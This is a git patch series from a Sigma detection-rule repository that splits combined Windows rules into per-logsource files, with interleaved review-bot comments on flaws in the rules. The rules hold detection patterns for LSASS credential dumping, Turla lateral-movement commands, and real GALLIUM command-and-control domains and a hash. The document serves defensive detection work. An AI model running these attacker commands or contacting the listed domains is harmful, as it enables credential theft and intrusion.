mode 100644 index 00000000..f65194e2 --- /dev/null 
+++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -0,0 +1,27 @@ +title: SILENTTRINITY Stager Execution +id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d +related: + - id: 03552375-cc2c-4883-bbe4-7958d5a980be + type: derived +status: experimental +description: Detects SILENTTRINITY stager use +references: + - https://github.com/byt3bl33d3r/SILENTTRINITY +author: Aleksey Potapov, oscd.community +date: 2019/10/22 +modified: 2021/09/19 +tags: + - attack.command_and_control +logsource: + category: image_load + product: windows +detection: + selection: + Description|contains: 'st2stager' + condition: selection +falsepositives: + - unknown +level: high + + + diff --git a/rules/windows/process_creation/win_silenttrinity_stage_use.yml b/rules/windows/process_creation/win_silenttrinity_stage_use.yml index d4699449..5a140744 100644 --- a/rules/windows/process_creation/win_silenttrinity_stage_use.yml +++ b/rules/windows/process_creation/win_silenttrinity_stage_use.yml @@ -1,28 +1,21 @@ -action: global title: SILENTTRINITY Stager Execution +id: 03552375-cc2c-4883-bbe4-7958d5a980be status: experimental description: Detects SILENTTRINITY stager use references: - https://github.com/byt3bl33d3r/SILENTTRINITY author: Aleksey Potapov, oscd.community date: 2019/10/22 -modified: 2020/09/06 +modified: 2021/09/19 tags: - attack.command_and_control +logsource: + category: process_creation + product: windows detection: selection: Description|contains: 'st2stager' condition: selection falsepositives: - unknown -level: high ---- -id: 03552375-cc2c-4883-bbe4-7958d5a980be -logsource: - category: process_creation - product: windows ---- -id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d -logsource: - category: image_load - product: windows +level: high \ No newline at end of file From 18e7e1600525b9918a7ab55b980eae7b94190a34 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sun, 19 Sep 2021 10:12:03 +0200 Subject: [PATCH 0977/1367] split win_mal_adwind.yml --- .../file_event/file_event_mal_adwind.yml | 31 ++++++++++++++++++ .../image_load_silenttrinity_stage_use.yml | 5 +-- .../process_creation/win_mal_adwind.yml | 32 +++---------------- .../registry_event_mal_adwind.yml | 27 ++++++++++++++++ 4 files changed, 63 insertions(+), 32 deletions(-) create mode 100644 rules/windows/file_event/file_event_mal_adwind.yml create mode 100644 rules/windows/registry_event/registry_event_mal_adwind.yml diff --git a/rules/windows/file_event/file_event_mal_adwind.yml b/rules/windows/file_event/file_event_mal_adwind.yml new file mode 100644 index 00000000..bab32007 --- /dev/null +++ b/rules/windows/file_event/file_event_mal_adwind.yml @@ -0,0 +1,31 @@ +title: Adwind RAT / JRAT +id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 +related: + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived +status: experimental +description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +references: + - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 + - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf +author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +date: 2017/11/10 +modified: 2021/09/19 +tags: + - attack.execution + - attack.t1059.005 + - attack.t1059.007 + - attack.t1064 # an old one +logsource: + category: file_event + product: windows +detection: + selection: + - TargetFilename|contains|all: + - '\AppData\Roaming\Oracle\bin\java' + - '.exe' + - TargetFilename|contains|all: + - '\Retrive' + - '.vbs' + condition: selection +level: high \ No newline at end of file diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml index f65194e2..670866fa 100644 
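Review bot: The description `Detects javaw.exe in AppData folder as used by Adwind / JRAT` was copied verbatim from the process_creation rule, but this rule matches file creations of the Java binary under `\AppData\Roaming\Oracle\bin\` and of files whose path contains `\Retrive` and `.vbs`, and the registry_event rule created in the same commit (two files further on) carries the same sentence although it matches a `Run` key value; each description should state what that rule's log source actually observes. All three split rules also keep the identical title `Adwind RAT / JRAT`, which makes alerts keyed on title ambiguous — a suffix such as `Adwind RAT / JRAT - File Creation` would keep them distinguishable.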
--- a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml +++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -21,7 +21,4 @@ detection: condition: selection falsepositives: - unknown -level: high - - - +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_mal_adwind.yml b/rules/windows/process_creation/win_mal_adwind.yml index 1dc05a4a..6072400e 100644 --- a/rules/windows/process_creation/win_mal_adwind.yml +++ b/rules/windows/process_creation/win_mal_adwind.yml @@ -1,5 +1,5 @@ -action: global title: Adwind RAT / JRAT +id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 status: experimental description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: @@ -7,17 +7,12 @@ references: - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community date: 2017/11/10 -modified: 2021/06/27 +modified: 2021/09/19 tags: - attack.execution - attack.t1059.005 - attack.t1059.007 - attack.t1064 # an old one -detection: - condition: selection -level: high ---- -id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 logsource: category: process_creation product: windows @@ -31,25 +26,6 @@ detection: - 'cscript.exe' - 'Retrive' - '.vbs ' ---- -id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 -logsource: - category: file_event - product: windows detection: - selection: - - TargetFilename|contains|all: - - '\AppData\Roaming\Oracle\bin\java' - - '.exe' - - TargetFilename|contains|all: - - '\Retrive' - - '.vbs' ---- -id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 -logsource: - category: registry_event - product: windows -detection: - selection: - TargetObject|startswith: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - Details|startswith: '%AppData%\Roaming\Oracle\bin\' + condition: selection +level: high \ No newline at end of file 
diff --git a/rules/windows/registry_event/registry_event_mal_adwind.yml b/rules/windows/registry_event/registry_event_mal_adwind.yml new file mode 100644 index 00000000..3bdba761 --- /dev/null +++ b/rules/windows/registry_event/registry_event_mal_adwind.yml @@ -0,0 +1,27 @@ +title: Adwind RAT / JRAT +id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 +related: + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived +status: experimental +description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +references: + - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 + - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf +author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +date: 2017/11/10 +modified: 2021/09/19 +tags: + - attack.execution + - attack.t1059.005 + - attack.t1059.007 + - attack.t1064 # an old one +logsource: + category: registry_event + product: windows +detection: + selection: + TargetObject|startswith: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + Details|startswith: '%AppData%\Roaming\Oracle\bin\' + condition: selection +level: high From deb0ad5f5845f131b21e372a236d76e20692c6cc Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 10:19:34 +0200 Subject: [PATCH 0978/1367] split win_hktl_createminidump.yml --- .../file_event_hktl_createminidump.yml | 25 +++++++++++++++++++ .../win_hktl_createminidump.yml | 21 ++++------------ .../process_creation/win_mal_adwind.yml | 1 - 3 files changed, 30 insertions(+), 17 deletions(-) create mode 100644 rules/windows/file_event/file_event_hktl_createminidump.yml diff --git a/rules/windows/file_event/file_event_hktl_createminidump.yml b/rules/windows/file_event/file_event_hktl_createminidump.yml new file mode 100644 index 00000000..35b0c8ce --- /dev/null +++ b/rules/windows/file_event/file_event_hktl_createminidump.yml 
@@ -0,0 +1,25 @@ +title: CreateMiniDump Hacktool +id: db2110f3-479d-42a6-94fb-d35bc1e46492 +related: + - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d + type: derived +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine +author: Florian Roth +references: + - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass +date: 2019/12/22 +modified: 2021/09/19 +tags: + - attack.credential_access + - attack.t1003.001 + - attack.t1003 # an old one +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|endswith: '\lsass.dmp' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_hktl_createminidump.yml b/rules/windows/process_creation/win_hktl_createminidump.yml index 17e9927c..c5645925 100644 --- a/rules/windows/process_creation/win_hktl_createminidump.yml +++ b/rules/windows/process_creation/win_hktl_createminidump.yml @@ -1,19 +1,15 @@ -action: global title: CreateMiniDump Hacktool +id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine author: Florian Roth references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass date: 2019/12/22 +modified: 2021/09/19 tags: - attack.credential_access - attack.t1003.001 - attack.t1003 # an old one -falsepositives: - - Unknown -level: high ---- -id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d logsource: category: process_creation product: windows 
@@ -23,13 +19,6 @@ detection: selection2: Imphash: '4a07f944a83e8a7c2525efa35dd30e2f' condition: 1 of them ---- -id: db2110f3-479d-42a6-94fb-d35bc1e46492 -logsource: - product: windows - category: file_event -detection: - selection: - EventID: 11 - TargetFilename|endswith: '\lsass.dmp' - condition: 1 of them +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_mal_adwind.yml b/rules/windows/process_creation/win_mal_adwind.yml index 6072400e..35a24f5a 100644 --- a/rules/windows/process_creation/win_mal_adwind.yml +++ b/rules/windows/process_creation/win_mal_adwind.yml @@ -26,6 +26,5 @@ detection: - 'cscript.exe' - 'Retrive' - '.vbs ' -detection: condition: selection level: high \ No newline at end of file From dc8ad15d1a59ec638ad27f1cfa50f1e0e3e80e5f Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:03:16 +0200 Subject: [PATCH 0979/1367] split win_exchange_transportagent.yml --- .../win_exchange_transportagent.yml | 29 +++++++------------ .../image_load_silenttrinity_stage_use.yml | 1 + ...s_creation_win_exchange_transportagent.yml | 24 +++++++++++++++ 3 files changed, 36 insertions(+), 18 deletions(-) rename rules/windows/{process_creation => builtin}/win_exchange_transportagent.yml (73%) create mode 100644 rules/windows/process_creation/process_creation_win_exchange_transportagent.yml diff --git a/rules/windows/process_creation/win_exchange_transportagent.yml b/rules/windows/builtin/win_exchange_transportagent.yml similarity index 73% rename from rules/windows/process_creation/win_exchange_transportagent.yml rename to rules/windows/builtin/win_exchange_transportagent.yml index 4c7f7cee..82fd5dde 100644 --- a/rules/windows/process_creation/win_exchange_transportagent.yml +++ b/rules/windows/builtin/win_exchange_transportagent.yml 
@@ -1,5 +1,8 @@ -action: global title: MSExchange Transport Agent Installation +id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 +related: + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: derived status: experimental description: Detects the Installation of a Exchange Transport Agent references: @@ -9,26 +12,16 @@ tags: - attack.t1505.002 author: Tobias Michalski date: 2021/06/08 -detection: - condition: selection -fields: - - AssemblyPath -falsepositives: - - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. -level: medium ---- -id: 83809e84-4475-4b69-bc3e-4aad8568612f -logsource: - product: windows - category: process_creation -detection: - selection: - CommandLine|contains: 'Install-TransportAgent' ---- -id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 +modified: 2021/09/19 logsource: product: windows service: msexchange-management detection: selection: - 'Install-TransportAgent' + condition: selection +fields: + - AssemblyPath +falsepositives: + - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. +level: medium \ No newline at end of file diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml index 670866fa..fd1358b0 100644 --- a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml +++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -17,6 +17,7 @@ logsource: product: windows detection: selection: + EventID: 11 # to pass the test otherwise block as same detection that 75c505b1-711d-4f68-a357-8c3fe37dbf2d Description|contains: 'st2stager' condition: selection falsepositives: diff --git a/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml new file mode 100644 index 00000000..a498310c --- /dev/null 
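Review bot: `EventID: 11` added to the image_load rule's selection is the Sysmon FileCreate event, while image loads are logged as Sysmon Event ID 7, so with this field the rule can no longer match any image-load event; the inline comment confirms it was added only to satisfy a duplicate-detection test. Drop the line — the differing `logsource` category is what distinguishes 75c505b1-711d-4f68-a357-8c3fe37dbf2d from 03552375-cc2c-4883-bbe4-7958d5a980be — and make the test compare logsource together with detection instead. An explicit EventID is presumably redundant in a category-based rule anyway, since the backend's logsource mapping supplies it.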
+++ b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml @@ -0,0 +1,24 @@ +title: MSExchange Transport Agent Installation +id: 83809e84-4475-4b69-bc3e-4aad856861 +status: experimental +description: Detects the Installation of a Exchange Transport Agent +references: + - https://twitter.com/blueteamsec1/status/1401290874202382336?s=20 +tags: + - attack.persistence + - attack.t1505.002 +author: Tobias Michalski +date: 2021/06/08 +modified: 2021/09/19 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains: 'Install-TransportAgent' + condition: selection +falsepositives: + - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. +level: medium +fields: + - AssemblyPath \ No newline at end of file From 06de91c92a64d7d96bf88aeb220b5c77f88013d3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:07:24 +0200 Subject: [PATCH 0980/1367] split win_apt_wocao.yml --- rules/windows/builtin/win_apt_wocao.yml | 34 +++++++++++++++++++ ...cao.yml => process_creation_apt_wocao.yml} | 26 +++++--------- 2 files changed, 42 insertions(+), 18 deletions(-) create mode 100644 rules/windows/builtin/win_apt_wocao.yml rename rules/windows/process_creation/{win_apt_wocao.yml => process_creation_apt_wocao.yml} (81%) diff --git a/rules/windows/builtin/win_apt_wocao.yml b/rules/windows/builtin/win_apt_wocao.yml new file mode 100644 index 00000000..fc801151 --- /dev/null +++ b/rules/windows/builtin/win_apt_wocao.yml 
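Review bot: The falsepositives text `AssemblyPath is a good indicator for this` and the `fields: - AssemblyPath` entry were carried over from the msexchange-management rule, but `AssemblyPath` is a field of the Exchange management log, not of a process_creation event, so in this rule the hint cannot be acted on; point at `CommandLine` or `ParentImage` here, or drop the hint. `fields:` is also placed after `level:`, unlike the builtin rule in the previous hunk where it precedes `falsepositives`. The truncated `id` on the second line is corrected later in this series, in PATCH 0982.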
@@ -0,0 +1,34 @@ +title: Operation Wocao Activity +id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d +author: Florian Roth, frack113 +status: experimental +description: Detects activity mentioned in Operation Wocao report +references: + - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ + - https://twitter.com/SBousseaden/status/1207671369963646976 +tags: + - attack.discovery + - attack.t1012 + - attack.defense_evasion + - attack.t1036.004 + - attack.t1036 # an old one + - attack.t1027 + - attack.execution + - attack.t1053.005 + - attack.t1053 # an old one + - attack.t1059.001 + - attack.t1086 # an old one +date: 2019/12/20 +modified: 2021/09/19 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4799 + TargetUserName|startswith: 'Administr' + CallerProcessName|endswith: '\checkadmin.exe' + condition: selection +falsepositives: + - Administrators that use checkadmin.exe tool to enumerate local administrators +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_wocao.yml b/rules/windows/process_creation/process_creation_apt_wocao.yml similarity index 81% rename from rules/windows/process_creation/win_apt_wocao.yml rename to rules/windows/process_creation/process_creation_apt_wocao.yml index 977893ac..46bd5098 100644 --- a/rules/windows/process_creation/win_apt_wocao.yml +++ b/rules/windows/process_creation/process_creation_apt_wocao.yml @@ -1,5 +1,8 @@ -action: global title: Operation Wocao Activity +id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab +related: + - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d + type: derived author: Florian Roth, frack113 status: experimental description: Detects activity mentioned in Operation Wocao report 
@@ -19,23 +22,7 @@ tags: - attack.t1059.001 - attack.t1086 # an old one date: 2019/12/20 -modified: 2021/07/07 -falsepositives: - - Administrators that use checkadmin.exe tool to enumerate local administrators -level: high ---- -id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d -logsource: - product: windows - service: security -detection: - selection: - EventID: 4799 - TargetUserName|startswith: 'Administr' - CallerProcessName|endswith: '\checkadmin.exe' - condition: selection ---- -id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab +modified: 2021/09/19 logsource: category: process_creation product: windows @@ -53,3 +40,6 @@ detection: - 'iie.exe iie.txt' - 'reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\' condition: selection +falsepositives: + - Administrators that use checkadmin.exe tool to enumerate local administrators +level: high \ No newline at end of file From b576ad115b14a40f44563b2874fe973f10cca05e Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:11:04 +0200 Subject: [PATCH 0981/1367] split win_apt_unidentified_nov_18.yml --- .../file_event_apt_unidentified_nov_18.yml | 24 +++++++++++++++++++ .../win_apt_unidentified_nov_18.yml | 22 ++++------------- 2 files changed, 29 insertions(+), 17 deletions(-) create mode 100644 rules/windows/file_event/file_event_apt_unidentified_nov_18.yml diff --git a/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml new file mode 100644 index 00000000..bf65f672 --- /dev/null +++ b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml 
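Review bot: The falsepositives entry `Administrators that use checkadmin.exe tool to enumerate local administrators` now closes the process_creation rule, yet the checkadmin.exe selection moved to the new builtin/security rule in this commit and the command lines visible at the end of this hunk (`iie.exe iie.txt`, `reg query ... PuTTY\Sessions\`) do not involve it; the note belongs to the security-log rule only. Replace it here with a false-positive statement about those command lines, or `- Unknown` if none is known. The middle of the detection block lies outside this hunk, so a checkadmin.exe entry there cannot be ruled out from this view.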
@@ -0,0 +1,24 @@ +title: Unidentified Attacker November 2018 +id: 3a3f81ca-652c-482b-adeb-b1c804727f74 +related: + - id: 7453575c-a747-40b9-839b-125a0aae324b + type: derived +status: stable +description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with + YYTRIUM/APT29 campaign in 2016. +references: + - https://twitter.com/DrunkBinary/status/1063075530180886529 +author: '@41thexplorer, Microsoft Defender ATP' +date: 2018/11/20 +modified: 2021/09/19 +tags: + - attack.execution + - attack.t1218.011 + - attack.t1085 # an old one +logsource: + product: windows + category: file_event +detection: + TargetFilename|contains: 'ds7002.lnk' + condition: selection +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml index 1ff40f48..9b992458 100644 --- a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml +++ b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml @@ -1,5 +1,5 @@ -action: global title: Unidentified Attacker November 2018 +id: 7453575c-a747-40b9-839b-125a0aae324b status: stable description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016. 
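Review bot: The `detection` block lists `TargetFilename|contains: 'ds7002.lnk'` directly under `detection:` with no `selection:` key, yet the condition is `condition: selection`, so the rule references an undefined identifier and will be rejected by the converter (the original global rule had it under `selection2:`). Nest it as `selection:` followed by an indented `TargetFilename|contains: 'ds7002.lnk'`. The description also carries the typo `unidetefied` over from the original, and marking a freshly split rule `status: stable` before it has been converted once is optimistic.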
@@ -7,29 +7,17 @@ references: - https://twitter.com/DrunkBinary/status/1063075530180886529 author: '@41thexplorer, Microsoft Defender ATP' date: 2018/11/20 -modified: 2020/08/26 +modified: 2021/09/19 tags: - attack.execution - attack.t1218.011 - attack.t1085 # an old one -detection: - condition: 1 of them -level: high ---- -id: 7453575c-a747-40b9-839b-125a0aae324b logsource: category: process_creation product: windows detection: - selection1: + selection: CommandLine|contains: 'cyzfc.dat,' CommandLine|endswith: 'PointFunctionCall' ---- -id: 3a3f81ca-652c-482b-adeb-b1c804727f74 -# Sysmon: File Creation (ID 11) -logsource: - product: windows - category: file_event -detection: - selection2: - TargetFilename|contains: 'ds7002.lnk' + condition: selection +level: high From c43c12e557f48dc078026eeef086dfeda10596ff Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:17:50 +0200 Subject: [PATCH 0982/1367] split win_apt_turla_commands.yml --- ...s_creation_apt_turla_commands_critical.yml | 32 +++++++++++++++++++ ...ss_creation_apt_turla_commands_medium.yml} | 20 +++--------- ...s_creation_win_exchange_transportagent.yml | 2 +- 3 files changed, 37 insertions(+), 17 deletions(-) create mode 100755 rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml rename rules/windows/process_creation/{win_apt_turla_commands.yml => process_creation_apt_turla_commands_medium.yml} (74%) mode change 100755 => 100644 diff --git a/rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml b/rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml new file mode 100755 index 00000000..3d9c64bd --- /dev/null +++ b/rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml 
@@ -0,0 +1,32 @@ +title: Turla Group Lateral Movement +id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f +status: experimental +description: Detects automated lateral movement by Turla group +references: + - https://securelist.com/the-epic-turla-operation/65545/ +tags: + - attack.g0010 + - attack.execution + - attack.t1059 + - attack.lateral_movement + - attack.t1077 # an old one + - attack.t1021.002 + - attack.discovery + - attack.t1083 + - attack.t1135 +author: Markus Neis +date: 2017/11/07 +modified: 2021/09/19 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine: + - 'net use \\%DomainController%\C$ "P@ssw0rd" *' + - 'dir c:\\*.doc* /s' + - 'dir %TEMP%\\*.exe' + condition: selection +level: critical +falsepositives: + - Unknown \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_turla_commands.yml b/rules/windows/process_creation/process_creation_apt_turla_commands_medium.yml old mode 100755 new mode 100644 similarity index 74% rename from rules/windows/process_creation/win_apt_turla_commands.yml rename to rules/windows/process_creation/process_creation_apt_turla_commands_medium.yml index 61b55cf1..41af8a48 --- a/rules/windows/process_creation/win_apt_turla_commands.yml +++ b/rules/windows/process_creation/process_creation_apt_turla_commands_medium.yml @@ -1,5 +1,5 @@ -action: global title: Turla Group Lateral Movement +id: 75925535-ca97-4e0a-a850-00b5c00779dc status: experimental description: Detects automated lateral movement by Turla group references: 
@@ -16,24 +16,10 @@ tags: - attack.t1135 author: Markus Neis date: 2017/11/07 -modified: 2020/08/27 +modified: 2021/09/19 logsource: category: process_creation product: windows -falsepositives: - - Unknown ---- -id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f -detection: - selection: - CommandLine: - - 'net use \\%DomainController%\C$ "P@ssw0rd" *' - - 'dir c:\\*.doc* /s' - - 'dir %TEMP%\\*.exe' - condition: selection -level: critical ---- -id: 75925535-ca97-4e0a-a850-00b5c00779dc detection: netCommand1: CommandLine: 'net view /DOMAIN' @@ -44,3 +30,5 @@ detection: timeframe: 1m condition: netCommand1 | near netCommand2 and netCommand3 level: medium +falsepositives: + - Unknown diff --git a/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml index a498310c..564270ff 100644 --- a/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml +++ b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml @@ -1,5 +1,5 @@ title: MSExchange Transport Agent Installation -id: 83809e84-4475-4b69-bc3e-4aad856861 +id: 83809e84-4475-4b69-bc3e-4aad8568612f status: experimental description: Detects the Installation of a Exchange Transport Agent references: From e69ec4624a636daf9cf65f8d4d1b788daf7be89a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:24:17 +0200 Subject: [PATCH 0983/1367] split win_apt_gallium.yml --- rules/windows/builtin/win_apt_gallium.yml | 34 +++++++++++++++ .../process_creation_apt_gallium.yml | 31 ++++++++++++++ ... => process_creation_apt_gallium_sha1.yml} | 42 +++---------------- 3 files changed, 70 insertions(+), 37 deletions(-) create mode 100644 rules/windows/builtin/win_apt_gallium.yml create mode 100644 rules/windows/process_creation/process_creation_apt_gallium.yml rename rules/windows/process_creation/{win_apt_gallium.yml => process_creation_apt_gallium_sha1.yml} (66%) 
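Review bot: After this hunk nothing links the medium rule to the critical rule carved out of the same document; the later split commits in this series add a `related:` block, so `related:` / `  - id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f` / `    type: similar` under `id:` would keep that history. Separately, the retained `condition: netCommand1 | near netCommand2 and netCommand3` with `timeframe: 1m` (context lines, unchanged) uses the `near` aggregation, which only a handful of sigmac backends implement, so most consumers will fail to convert this now-standalone file; that predates the commit, but a sentence in `description` saying so would save people a surprise. The `@@ -44,3 +30,5 @@` hunk only moves `falsepositives:` to the end of the file.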
diff --git a/rules/windows/builtin/win_apt_gallium.yml b/rules/windows/builtin/win_apt_gallium.yml new file mode 100644 index 00000000..06c9a76d --- /dev/null +++ b/rules/windows/builtin/win_apt_gallium.yml @@ -0,0 +1,34 @@ +title: GALLIUM Artefacts +id: 3db10f25-2527-4b79-8d4b-471eb900ee29 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: experimental +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +author: Tim Burrell +date: 2020/02/07 +modified: 2021/09/19 +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +tags: + - attack.credential_access + - attack.command_and_control +logsource: + product: windows + service: dns-server +detection: + c2_selection: + EventID: 257 + QNAME: + - 'asyspy256.ddns.net' + - 'hotkillmail9sddcc.ddns.net' + - 'rosaf112.ddns.net' + - 'cvdfhjh1231.myftp.biz' + - 'sz2016rose.ddns.net' + - 'dffwescwer4325.myftp.biz' + - 'cvdfhjh1231.ddns.net' + condition: c2_selection +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_apt_gallium.yml b/rules/windows/process_creation/process_creation_apt_gallium.yml new file mode 100644 index 00000000..ba369fe5 --- /dev/null +++ b/rules/windows/process_creation/process_creation_apt_gallium.yml 
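Review bot: `QNAME:` is an exact match on bare domain names, but the DNS Server analytical log (event 257, RESPONSE_SUCCESS) records QNAME as a fully-qualified name with a trailing dot (e.g. `asyspy256.ddns.net.`) as far as I recall; if that holds for your source the list never matches, and `QNAME|contains:` (or appending the trailing dot to each value) is needed — please verify against a sample event. Event 257 also only covers successful responses, so a lookup that fails to resolve (258) or the query itself (256) is missed; `EventID:` / `  - 256` / `  - 257` would catch the query regardless of outcome. The `logsource` has no `definition:` stating that the DNS analytical log must be enabled (the dn800669 reference describes this), which the slingshot rule later in this series does for its audit-policy requirement.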
@@ -0,0 +1,31 @@ +title: GALLIUM Artefacts +id: 18739897-21b1-41da-8ee4-5b786915a676 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: experimental +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +author: Tim Burrell +date: 2020/02/07 +modified: 2021/09/19 +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +tags: + - attack.credential_access + - attack.command_and_control +logsource: + product: windows + category: process_creation +detection: + legitimate_process_path: + Image|contains: + - ':\Program Files(x86)\' + - ':\Program Files\' + legitimate_executable: + sha1: + - 'e570585edc69f9074cb5e8a790708336bd45ca0f' + condition: legitimate_executable and not legitimate_process_path +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_gallium.yml b/rules/windows/process_creation/process_creation_apt_gallium_sha1.yml similarity index 66% rename from rules/windows/process_creation/win_apt_gallium.yml rename to rules/windows/process_creation/process_creation_apt_gallium_sha1.yml index 41d7f628..20aa889b 100644 --- a/rules/windows/process_creation/win_apt_gallium.yml +++ b/rules/windows/process_creation/process_creation_apt_gallium_sha1.yml 
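Review bot: The `legitimate_process_path` filter lists `':\Program Files(x86)\'` without the space before `(x86)`; the real directory is `\Program Files (x86)\`, so 32-bit installs under that path are never excluded and the rule fires on the legitimate binary there. Change it to `- ':\Program Files (x86)\'` (the second entry, `':\Program Files\'`, is fine). The `sha1:` field is not emitted natively by Sysmon, which logs `Hashes: SHA1=...,MD5=...`, so this rule relies on the backend's generic hash field mapping; a short `definition:` saying so would spare consumers a silent no-match, though I am inferring the intended source from `category: process_creation`.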
